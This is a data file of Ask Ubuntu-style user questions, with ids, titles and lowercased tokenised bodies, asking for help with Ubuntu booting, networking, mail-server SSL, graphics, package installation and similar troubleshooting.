476040	booting ubuntu 14.04 from external hdd in windows 8.1	i 'm trying to run ubuntu on an external hdd . i am able to successfully boot from this hard drive on my windows 7 machine but when i try to boot from it on my lenovo think pad twist ( windows 8.1 ) , i am able to see the drive but then it does nothing when i select it . i originally thought there was an issue with my grub . however , since i can boot from it on one computer and not the other , i am quite confused . any ideas ? update : i was able to test it out on 2 other computers and it would work just fine . it seems like it just does n't like my laptop ( which is uefi )
476041	how do i make rsync delete files that have been deleted from the source folder ?	i recently set up a machine with ubuntu server to host game servers . i installed a backup plugin for each game server that creates frequent backups of game world files in a particular folder on the machine . i also established a `` cron '' task to automatically copy those backups to my dropbox folder every night using rsync with the -a option . after a few months my dropbox account reached its storage limit and i realized i would not be able to keep so many backups , so i configured the game server backup plugin to not retain so many backups , then waited a few days to see if it would delete the older backups as it is scheduled to do on a weekly basis . the backup plugin eventually did its job and deleted the older backups , so i was expecting the rsync cron task to subsequently delete the older backups from my dropbox folder to match the source folder , but it has not done so . so i have a couple of questions : by default , does rsync only add files to the destination folder that have been added to the source folder and change files that have been changed in the source folder but not delete files that were deleted from the source folder ? if that is the case , what is the best way to make rsync do this ? i want the destination folder to perfectly reflect the source folder , and that means deleting any files that have been deleted from the source folder . i see some options listed in the manual page for rsync that might do the trick , but since i 'm not familiar with it i figured i should ask here to make sure i do it right . thank you !
476042	how to make my ip direct to my website instead of router ?	this has been a few hour struggle trying to figure this out ( especially when i 'm a total novice ) . i 've found stuff on port directing , but ca n't really figure it out , watched a few youtube videos and still lost . i 'm using a cisco router and when i use my ip it goes to my router settings instead of my website . i thought i had it figured out by using my ipv4 address ( whatever that is ) , i can get to my site from my computer no problem with the url now ... but no one else can .
476044	screen is displaying wrong colors after dual booting 14.04	i have a dell inspiron 17r which has an intel hd graphics 4400 gpu dual booted with ubuntu and windows 8 . when i first tried ubuntu without installing my screen was green instead of the usually orange glow . i just assumed i would need to download a package to get better graphics after the install in order to fix this problem . i decided to install it and i did so with accepting the 3rd party add ons for media and color support . after i restarted to check if everything worked , ubuntu had its normal orange background and the colors were normal . i restarted again to check windows and everything was okay . now for some reason , whenever i load ubuntu i have the original problem of horrible discoloration and was wondering if anyone knows what could have gone wrong ? note : i restarted my computer in a fail safe graphics mode ( recovery option ) and the color is normal . however when i restarted my computer in the normal mode it goes back to the screen color below . note2 : after entering `` apt-cache policy xserver-xorg-video-intel mesa-utils '' into the command line the console outputted : xserver-xorg-video-intel : installed : 2:2.99.910-0ubuntu1 candidate : 2:2.99.910-0ubuntu1 version table : * 2:2.99.910-0ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status mesa-utils : installed : ( none ) candidate : 8.1.0-2 version table : 8.1.0-2 0 500 http : //us.archive.ubuntu.com/ubuntu/ trusty/universe amd64 packages note3 : here is the pasted xorg file : http : //paste.ubuntu.com/7581271/ here 's a screenshot of my issue ( taken with my phone ) :
476045	how to change font of code in pycharm ?	pycharm community edition 3.1.3 on ubuntu gnome 14.04 . ca n't find where to change the font of code in pycharm . file > settings > editor > colors & fonts > font > editor font is inactive . i can only change font size by setting file > settings > editor > [ v ] change font size ( zoom ) with ctrl+mouse wheel but how to change font style/type ( < somefont > - > courier new ) ? by the way , how to disable spell check ? it 's non-sense to check spelling in filenames and programming code .
476051	dovecot postfix not working when using a ca certificate	i am having a problem switching from using a self signed certificate in dovecot/postfix to using one i got from a ca . it is a password protected key and this is my dovecot ssl config file . ( 10-ssl.conf ) # # # # ssl settings # # # ssl/tls support : yes , no , required . < doc/wiki/ssl.txt > ssl = yes # pem encoded x.509 ssl/tls certificate and private key . they 're opened before # dropping root privileges , so keep the key file unreadable by anyone but # root . included doc/mkcert.sh can be used to easily generate self-signed # certificate , just make sure to update the domains in dovecot-openssl.cnf ssl_cert = < /etc/dovecot/website_crt.pem ssl_key = < /etc/dovecot/private/website_key.pem # if key file is password protected , give the password here . alternatively # give it when starting dovecot with -p parameter . since this file is often # world-readable , you may want to place this setting instead to a different # root owned 0600 file by using ssl_key_password = < path . ssl_key_password = < /root/path_to_key_password_file.conf # pem encoded trusted certificate authority . set this only if you intend to use # ssl_verify_client_cert=yes . the file should contain the ca certificate ( s ) # followed by the matching crl ( s ) . ( e.g . ssl_ca = < /etc/ssl/certs/ca.pem ) ssl_ca = < /etc/dovecot/website.ca.pem # require that crl check succeeds for client certificates . # ssl_require_crl = yes i know i should change the first ssl parameter to ssl= required but i want to get a test connection up and running first . i the password file contains only : ssl_key_password = password i can access the mail database on roundcube webmail when using a self-signed certificate but not when using the one from a ca ( i get an `` connection to database failed '' error ) and i ca n't access it at all when using thunderbird with either certificates . i have ports 22,25/tcp,993,993/tcp,995,465/tcp,587/tcp,143,110,80,80/tcp,443 , open on the server which is a vps server . i am using ufw for my firewall . this is the error i get in the roundcube webmail error log imap error : login failed for me @ website.net from my.remote.ip.address . empty startup greeting ( localhost:143 ) in /path/to/roundcube/imap.php on line 184 ( post /mail/ ? _task=login ? _task=login & _action=login ) this is the postfix main.cf file ( one with certificate information ) . here is the tls parameters section # tls parameters # smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem # smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key # smtpd_use_tls=yes # smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache # smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_tls_cert_file=/etc/dovecot/website_crt.pem smtpd_tls_key_file=/etc/dovecot/private/website_key.pem smtpd_use_tls=yes smtpd_tls_auth_only = yes # enabling smtp for authenticated users , and handing off authentication to dovecot smtpd_sasl_type = dovecot smtpd_sasl_path = private/auth smtpd_sasl_auth_enable = yes smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination my website works correctly otherwise with my ca certificate . i have a certificate.crt , private_key.key , and intermediate.crt files that work when using apache 2.4.7 . when i made the .pem files for dovecot/postfix i took the information in my .crt and .key files and pasted it into a new file with a .pen extension . the certificates are in x.509 format from the ca when i created the .crt files and the .key files is an rsa encryption key ( im not sure if that is also x.509 format ) . is there some kind of file conversion i need to do to the certificate/key files to make it .pem or just change the extension ? i can not send or receive email when using a self=signed certificate ( as i expected ) . i am using gmail to send and receive test emails from my email address . i am at a loss as to what to do next please help !
476053	virtual host , port 443 and ssl issue	i have a centos server , but i am having some issue regarding port 443 and ssl . my problem is that all domain on my server are accessible from https port . like when i visit a domain on my server from https , which do not have ssl , then it shows default host page ( default apache page ) i want only domain which i specified should only use ssl port . i have certificate for a domain , and i have added virtual host like this : < virtualhost *:80 *:443 > .. .. servername domain.com serveralias www.domain.com errorlog ... customlog ... < /virtualhost > and other certificate file locations are specified in /etc/httpd/conf.d/ss.conf thanks for help
476054	unable to choose desktop environment 14.04	i do n't have the dropdown menu in the login screen . this question was posed earlier but closed as not being reproducible . guess what ? i have that problem also . any knowledgeable suggestions would be appreciated . generally , i 've installed a bunch of desktops , but am unable to access any of them .
476057	knowing graphic card memory	when i put lspci | grep vga i got these 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 435m ] ( rev a1 ) is there any way to know more detail on them ? for example my nvidia is 1gb is there any command line which shows nvidia is 1gb ?
476066	link/merge pictures folder across all users ?	what i want to do is , link/merge folders /home/user1/pictures /home/user2/pictures so that all the family photos can be stored in a single location and be easily accessible from every user account . i tried the ln command but it did n't work because owners of both folders are different .
476068	more about juju cache	i would like to know more about juju cache . after i start a charm and juju provisions a machine for the first time , the charm will be downloaded and all dependencies installed ( apt-get , etc ) . this process can be very long . once the charm has been build , configured and deployed once , can juju provision more instances of the same charm pre-built and configured ? i presume that 's what the cache is for , but the documentation is not very explicit : https : //juju.ubuntu.com/docs/charms-deploying.html how juju tracks the state of the charm if it works that way ? thanks nic
476069	how do i open/run bluej ?	i 'm new to ubuntu . i 've previously used bluej on my windows computer , but now wish to do so on ubuntu . i 've downloaded bluej and now have a folder on my desktop called bluej-311 . when i type 'sudo apt-get install openjdk-7-jdk ' in the terminal window , i get the following message : reading package lists ... done building dependency tree reading state information ... done openjdk-7-jdk is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . how do i run bluej ? what do i need to do to proceed from here ? many thanks !
476070	how to change kernel options on ubuntu 12.04	i am to install dummynet and according to this manpage http : //goo.gl/qqjwfg i have to make the following changes in the kernel configuration file : options ipfirewall options dummynet options hz=1000 how do i access the kernel configuration file to make these changes ? please help .
476071	how to install aircrack on ubuntu 12.04	i have downloaded the tar.gz package from the site and then i have extracted using tar -zxvf command as mentioned over there . after that i used sudo apt-get install build-essential then i further installed libssl-dev . then i changed directory to the aircrack folder . but when i type either sudo make or just make i am getting this same error . i do n't know what to do . i have installed the file what they have asked in the error as well . still the same error is shown . okay i am not permitted to upload images . the error is : common.mak:85 : *** can not find development files for any supported version of libnl . install either libnl1 or libnl3.. stop .
476072	cinnamon ppa was not found	i am unable to add cinnamon ppa on ubuntu 12.04 lts . the add-apt-repository ca n't access the ppa . also , when i visit ppa url on https : //launchpad.net/~gwendal-lebihan-dev/+archive/cinnamon-stable , i get 404 error . is the cinnamon ppa deleted ?
476073	installed minimal ubuntu 13.10 & what do i do next	well , i recently installed minimal ubuntu 13.10 using a mini.iso downloaded from ubuntu website . everything went great until i got to the command line . username : no problem password : no problem as i 've above information , but what do i do about the @ dynamic line ? ( or ... something similar to that ? ) please advise on this .
476074	gnome-subtitles shows no video	when i open a subtitle here in gnome subtitles there is no video . just the subs , the audio , and the black screen . it used to work in previous ubuntu instalations i had and in linux mint . just found in internet about a missing codec , the gstreamer0.10-ffmpeg . it should solve this issue , but when i try to download i get an error message that this package is not available . here you can find it : https : //apps.ubuntu.com/cat/applications/gstreamer0.10-ffmpeg/ is n't it available to 14.04 ? i could n't not even download and install it , shows error messages , can someone help me to understant it ?
476076	i want to install xubuntu 14.04 alongside my windows vista installation ?	i 've decided that i want to install a backup os on my pc which is currently equipped with windows vista . seeing as to how wubi is no longer supported , how exactly do i install it now . the liveusb is only giving me the `` install xubuntu instead of windows vista '' option .
476078	ubuntu 14.04 gnome crashed after installation	i have recently installed ubuntu 14.04 gnome and i was dual booting with gnome and unity but suddenly gnome crashed as when i open it it shows just a blank screen with a single arrow mark and nothing else i have waited for 20 minutes but the screen did not changed i have made a264gb partition for gnome and now as gnome has stopped working can i get that partition again into unity or can i repair gnome to work properly i have used gnome once and it worked properly that time can any one solve this issue
476079	not execute on the terminal	suppose that i saw these commands on the web sudo add-apt-repository ppa : atareao/atareao sudo apt-get update sudo apt-get install my-weather-indicator i copy all of them and i want to have them on my terminal . but the point is i do not like execute them . as you know if i select all three lines and copy all of them on the terminal , all of them will execute line by line . for for this moment i want to just have them on my terminal screen . and my self inter each line separately . so any suggestion .
476082	wubi ubuntu does not start	i have a new dell latitude 7440 laptop with windows 7 64 bit . it runs bios ( not uefi ) and the hard drive is mbr . however , wubi does not start . after i select ubuntu from the boot page . it gives a black screen . i confirmed that my computer is not running in safe mood . i tried with wubi ubuntu 12.10 any suggestions to get ubuntu to start ? thanks
476090	enable to connect to remote server using ssh but i can connect one remote server	when i am connecting to remote server using ip address , i can connect to 192.168.12.141 , but i can not connect to any another remote server . example : 192.168.12.12 , 13 , 18 etc ... how can i get permission or change the permission . can anyone help please username @ cl1 : ~ $ ssh 192.168.12.12 -l administrator @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ warning : remote host identification has changed ! @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ it is possible that someone is doing something nasty ! someone could be eavesdropping on you right now ( man-in-the-middle attack ) ! it is also possible that the rsa host key has just been changed . the fingerprint for the rsa key sent by the remote host is ee : f8:02:53 : eb:26:16:98 : c7:22 : ce:59 : ca : af : d4 : f6 . please contact your system administrator . add correct host key in /home/example/username/.ssh/known_hosts to get rid of this message . offending key in /home/example/username/.ssh/known_hosts:1 rsa host key for 192.168.12.12 has changed and you have requested strict checking . host key verification failed .
476094	scrolling inside the screen command	i am trying to use screen command in ubuntu . while the basic functionality works fine , i am having trouble while scrolling when i use split window functionality . here is the scr file i created . screen -t `` syslog monitor '' 1 tail -f /var/log/syslog screen -t `` cli window '' 2 bash split select 1 focus select 2 startup_message off when i go to the syslog monitor window , scrolling does not work . this works fine in redhat based servers . are there different commands for ubuntu ?
476095	install software package-centre app	i am trying to install the software-centre package on terminal.. i have entered these commands : sudo apt-get install software-center* i get this : the following package was automatically installed and is no longer required thuderbird-global menu use 'apt-get autoremove ' to remove them . another 'software-center ' has no installation candidate any ideas ?
476098	i want to install ubuntu leaving windows 8 and recovery partitions untouched	i tried installing ubuntu using a usb in my pre-installed windows 8 machine which is lenovo z500 . if i have to install ubuntu , do i have to make a partition in my c-drive ? is there another method in which i do n't have to erase my c-drive and install ubuntu ? . i dont want to disturb c drive as the one key recovery software of lenovo doesnt work if c drive is partitioned . **i am a beginner and dont know much of the technical stuff in linux . so a detailed description is appreciated..
476100	unity and the tray are not displayed after login	when i 'm log in the tray bar works . after the correct login it disappear , also the unity bar does n't appear . so i can not even start a terminal session for making changes , since it does not work the keyboard shortcut to launch it ( ctrl + alt + t ) . how can i restore the tray and unity bar , provided that this is the problem ? thanks all .
476106	leave the focus on the same monitor while switching desktops	when i switch desktop on one monitor focus switches to second monitor when there is window `` always on top '' and `` always on visible workspace '' . how can i solve this ?
476107	how to sync ubuntu/software/configurations between n computers with free software and/or without a cloud ?	note : this question is not about syncing data in a dropbox-like way ( files , folders ) , it is more about syncing configurations . i would like to have exactly the same version of ubuntu with all the software installed and configured both on my desktop pc and on my laptop pc ( and maybe on my small netbook pc ) without using ubuntu sync and with minimal maintenance effort ( setup once , run for a long time ) . the use case is the following : i work on my laptop pc and do some changes to software configuration , for example : configure vim to have a new plugin update the search tracker / recoll file search index configure thunderbird to have an additional imap account ( 'remember password ' ) add some new bookmarks in firefox/chrome change the desktop background image install new software with apt-get install build and install new software with checkinstall etc . i do some 'sync ' operation i switch to my desktop pc and get all the changes from ( 1 ) working on the desktop pc i work on my desktop pc and do some changes to software configuration , for example : add new directory to the list of directories to be backed up by dejadup add a new check spelling dictionary to the libreoffice writer configure the terminator software to have colored fonts install new font into the ubuntu system configure ekiga to make phone calls etc . i do some 'sync ' operation i switch to my laptop pc and get all the changes from ( 1 ) and ( 4 ) working on the laptop pc . question : what free/open-source software can i use to sync both machines ' ubuntu systems , installed software and configurations ? is it possible to do that without any cloud services ? complementary question : it is obvious that the desktop pc and the laptop pc have different hardware configurations . how does the 'sync software ' in question deal with video drivers , wlan drivers and their configurations ? note : i do not need all the pcs to be synced at the same time , because i work with only one single machine at once . note : i considered to use chef to solve the problem , but it seems that it might be really cumbersome to maintain such a setup . note : i also considered using a bootable usb with ubuntu installed ( portable linux ) , but i am not sure that the video drivers will work then .
476112	mounting a map on a server through a different server	first of all , my excuses , i could not find the question here anywhere . the thing is , i want to mount a map on server 1 , and server 1 is only accessible throughout server 2 . i 'm on pc 1 , which can only ssh to server 2 . how would i mount the map on server 1 ? with regards , jelmer
476119	is it possible to login into lightdm interactive screen remotely ?	i have this big ubuntu desktop that dubs also as a home cinema pc . when i feel lazy , i 'd love to be able to run the pc remotely and watch movies from my bed . i can turn it on via wol . i can launch remote applications remotely via ssh by modification to display and dbus_session_bus_address environment variables . the last obstacle is to bypass the login screen presented by ( lightdm ) . i do n't want to turn on automatic logging in for security reasons . i am not interested in forwarding remote windows locally ă la vnc .
476121	system is getting hanged	i 'm having a problem after log in on ubuntu . this problem had occurred in ubuntu 12.10 and also occurred in 14.04 lts . so i had to install 12.04 lts but it 's still occurring . the problem is i 'm receiving a pink or green color screen after log in on ubuntu and the whole system is getting hanged . it 's also happening during installation . whenever i 'm booting from a usb the screen is getting green and system is restarting . please tell me how to slove this problem . i 'm a new user in linux . i 've downloaded all these 3 versions but nothing is working . please help me .
476128	restart usb serial dsr	how to reset driver usb serial without unplugg device ? cause the dsr sometimes from 1 become 0 , though dsr and dtr in jumper , and must be 1 forever . thanks
476129	modem broadband issue	i have mobile broadband modem works fine on windows , on ubuntu 14.04 when i plugged it first time it works fine but after 10 minuets it disconnected and it does n't reconnect till i make restart for ubuntu .
476136	ubuntu 13.10 unity wo n't load from this morning	i turned on my pc this morning and unity will not load at all . i have tried loading it manually using ctrl+alt+f1 and all i got from it was the following : - compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl compiz ( core ) - info : starting plugin : opengl libgl error : dlopen /usr/lib/x86_64-linux-gnu/dri/r600_dri.so failed ( /usr/lib/x86_64- linux-gnu/dri/r600_dri.so : undefined symbol : _glapi_tls_dispatch ) libgl error : dlopen $ { origin } /dri/r600_dri.so failed ( $ { origin } /dri/r600_dri.so : can not open shared object file : no such file or directory ) libgl error : dlopen /usr/lib/dri/r600_dri.so failed ( /usr/lib/dri/r600_dri.so : can not open shared object file : no such file or directory ) libgl error : unable to load driver : r600_dri.so libgl error : driver pointer missing libgl error : failed to load driver : r600 libgl error : dlopen /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so failed ( /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so : undefined symbol : _glapi_tls_dispatch ) libgl error : dlopen $ { origin } /dri/swrast_dri.so failed ( $ { origin } /dri/swrast_dri.so : can not open shared object file : no such file or directory ) libgl error : dlopen /usr/lib/dri/swrast_dri.so failed ( /usr/lib/dri/swrast_dri.so : can not open shared object file : no such file or directory ) libgl error : unable to load driver : swrast_dri.so libgl error : failed to load driver : swrast compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( core ) - info : loading plugin : copytex compiz ( core ) - info : starting plugin : copytex compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( core ) - info : loading plugin : animation compiz ( core ) - info : starting plugin : animation compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - info : loading plugin : fade compiz ( core ) - info : starting plugin : fade compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - info : loading plugin : unityshell compiz ( core ) - info : starting plugin : unityshell warn 2014-06-03 10:55:31 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.autopilot.introspection ' yet as we do n't have a connection , waiting for it ... warn 2014-06-03 10:55:31 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.unity.debug.logging ' yet as we do n't have a connection , waiting for it ... compiz ( unityshell ) - error : gl_arb_vertex_buffer_object not supported compiz ( core ) - error : plugin initscreen failed : unityshell compiz ( core ) - error : failed to start plugin : unityshell compiz ( core ) - info : unloading plugin : unityshell x error of failed request : badwindow ( invalid window parameter ) major opcode of failed request : 18 ( x_changeproperty ) resource id in failed request : 0x4000006 serial number of failed request : 9909 current serial number in output stream : 9913 it was all working fine yesterday but this morning there was nothing .
476137	does ubuntu touch consume less power than android ?	one of the problems of new oss is power consumption . that is because power and performance requires a lot of tweaks and experience with the kernel , drivers and os code-base on one hand , and a lot of extensive long-term test and quality assurance on the other hand . given that android is a rather old and established os i saw that it has pretty good power consumption . phoronix does this kind of comparissions but i was not able to find much about ubuntu touch . does ubuntu touch consume less than android , do you have data on some platforms compared ?
476138	problems logging into windows after installing ubuntu	i installed ubuntu alongside windows 8 , and it works fine , but when i restart the computer , in the dual boot i get to choose : ubuntu advanced options for ubuntu windows boot manager ( on /dev/sda1 ) system setup if i click ubuntu it goes right to ubuntu and everything is fine . but clicking on windows i get the error : /endentire file path : /acpi ( a0341d0,0 ) /pci ( 2,1f ) /sata ( 0,0,0 ) /hd ( 1,800 , fa000,41ea8f607930ff48,2,2 ) /file ( \efi\microsoft\boot ) /file ( bootmgfw.efi ) /endentire error : can not load image . press any key to continue ... i press enter and i get : gnu grub version 2.02^beta2-9 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > _ here i type exit and hit enter , then i see the boot manager : uefi boot : ubuntu ... windows boot manager ... ... i choose windows ... and finally enter windows . why do i have to go through all this process to enter windows ? note : i tried windows 8 's 'boot repair ' but it did n't solve the problem edit : the solutions in the answers sound too risky for me ... is there a way i could at least make windows the default o.s ? in the current situation if i restart the computer and leave it without touching anything it loads automatically to ubuntu . can i make it load to windows 8 as a default ?
476139	usb/vga not recognized anymore	i do n't know what happened , but yesterday everything worked fine , but when i woke up this morning and booted my computer to ubuntu 14.04 a bunch of hardware is n't recognized anymore . i use a dual monitor setup with dvi-d and vga , but the vga screen is n't recognized anymore and the dvi-d monitor is recognized as `` built-in display '' while i 'm not on a laptop . also every device connected through usb is n't recognized anymore either . i have a keyboard with the blue round connector , which still works , so i can still log in though . the computer goes slower than usual and i have no idea what has happened . can anybody point me in the direction i should start looking , because this is scary ! i just checked and both the front and back sound connectors stopped working also : / edit : the devices connected through usb are recognized as they all show up using sudo lsusb , ubuntu just does n't let me use them anymore .
476140	perform some operation as soon as eth0 is up	i have to perform a routine which requires eth0 to be up . i have tried to put it into /etc/rc.local , anyway it could not be triggered as eth0 could have not been initialized yet . is there a way to attach to system 's event dispatcher so to start a script just when eth0 is detected to be up ?
476151	laptop goes to sleep right after boot with lid closed and external monitor connected	the issue is following : laptop ( hp6570p ) with kubuntu 14.04 installed , lid closed , external monitor is connected . reboot . laptop shows kdm login screen for a seconds and immediately goes to sleep . open lid wakes it up . login . then close the lid again . everything is fine . power option set to `` do nothing '' when lid is closed . any suggestions ?
476152	ubuntu server 12-04 can access lan but not internet	my ubuntu server stop going to internet , i can ping the server from the lan but the server do not go to the internet . ifconfig ; br0 link encap : ethernet hwaddr 00:10:18:77:5e:46 inet addr:192.168.2.100 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :210:18ff : fe77:5e46/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1510 errors:0 dropped:0 overruns:0 frame:0 tx packets:311 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:117213 ( 117.2 kb ) tx bytes:37549 ( 37.5 kb ) eth0 link encap : ethernet hwaddr 00:10:18:77:5e:46 inet addr:192.168.2.34 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :210:18ff : fe77:5e46/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1451 errors:0 dropped:1 overruns:0 frame:0 tx packets:617 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:138132 ( 138.1 kb ) tx bytes:75035 ( 75.0 kb ) interrupt:52 route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.2.1 0.0.0.0 ug 0 0 0 eth0 0.0.0.0 192.168.2.1 0.0.0.0 ug 100 0 0 br0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 br0 192.168.2.0 0.0.0.0 255.255.255.0 u 0 0 0 br0 192.168.2.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 192.168.122.0 0.0.0.0 255.255.255.0 u 0 0 0 virbr0 resolve.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.2.3 nameserver 8.8.8.8 nameserver 8.8.8.4 search miracledc any help is appreciated
476155	wifi gets connected but internet does n't work in ubuntu 14.04	i currently have ubuntu 14.04 lts installed on my laptop . the wifi gets connected without any problem but when i try to get internet access it becomes impossible . it works fine with a wireless usb toggle connection . internal wireless module does n't work properly what can i do to fix this ? my laptop is toshiba satellite a500 description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:0e:00.0 logical name : eth0 version : 03 serial : 00:26:22:4a:8f : a0 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168d-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:45 ioport:4000 ( size=256 ) memory : f2004000-f2004fff memory : f2000000-f2003fff memory : f2020000-f203ffff description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:14:00.0 logical name : wlan0 version : 01 serial : 00:23:08 : e9 : ba:6a width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-24-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:19 memory : f6000000-f600ffff description : wireless interface physical id : 2 bus info : usb @ 2:1 logical name : wlan1 serial : 74 : ea:3a:8b:05:60 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt2800usb driverversion=3.13.0-24-generic firmware=0.29 ip=192.168.2.5 link=yes multicast=yes wireless=ieee 802.11bgn
476157	kernel 3.14.1 compilation errors	i installed the kernel 3.14.1 and there seem to be no issues . uname -r 3.14.1-031401-generic however , when i try to goto the folder and try to do a make it fails . i see that multiple files are missing . any idea how i get them . sudo make hostld scripts/kconfig/conf scripts/kconfig/conf -- silentoldconfig kconfig make [ 1 ] : *** no rule to make target `/usr/src/linux-headers-3.14.1-031401-generic/arch/x86/syscalls/syscall_32.tbl ' , needed by `arch/x86/syscalls/../include/generated/uapi/asm/unistd_32.h ' . stop . make : *** [ archheaders ] error 2 i 'm not able to understand how to solve this error . i looked up online and i 'm now exhausted after spending 30 odd hours . please help me out . thanks !
476160	can local ubuntu server display gui app from remote desktop ?	local machine : ubuntu server 12.04 lts , 32 bits remote machine : ubuntu desktop 12.04 lts , 32 bits is it possible to launch firefox or any other gui-based applications on the remote desktop machine from the local machine ? or is it impossible ?
476165	hp proliant 460c g1 running ubuntu server	i am looking at installing ubuntu server on some old ( still running 100 % ) hp servers , we would like to run a hypervisor ( kvm ) and check if our vm 's will run . is there a version of ubuntu that supports this server .
476167	apt-get abort after i type y to continue	after i use sudo apt-get update & & sudo apt-get upgrade to check for updates via terminal , there 's a little problem but weird . after i answer to y , it must be running to downloading updates and installing . strangely , it instead to be aborted .
476169	installation of ruby on rails in ubuntu14.04	i want to know how to install ruby on rails on ubuntu14.04 . please help me . which versions are better to install and how to install ruby ( version ) , rubygems , rubygems_update -v ( version ) , mysql_server libmysqlclient-dev mysql2 , rails -v= ( version ) , rake -- version ( version ) , please frnds help me i need to develop a website . i had a domain too . thanks with advance .
476171	dual monitor setup only one monitor detected	i have a dual monitor setup connected through dvi-d and vga . until yesterday everything went fine , but now both screens turn on at kernel boot , while the vga screen turns off at ubuntu 14.04 boot . at the display settings the dvi-d screen is detected as `` built-in display '' , while i 'm not on a laptop and the other screen is n't even detected anymore . how do i get both monitors back ?
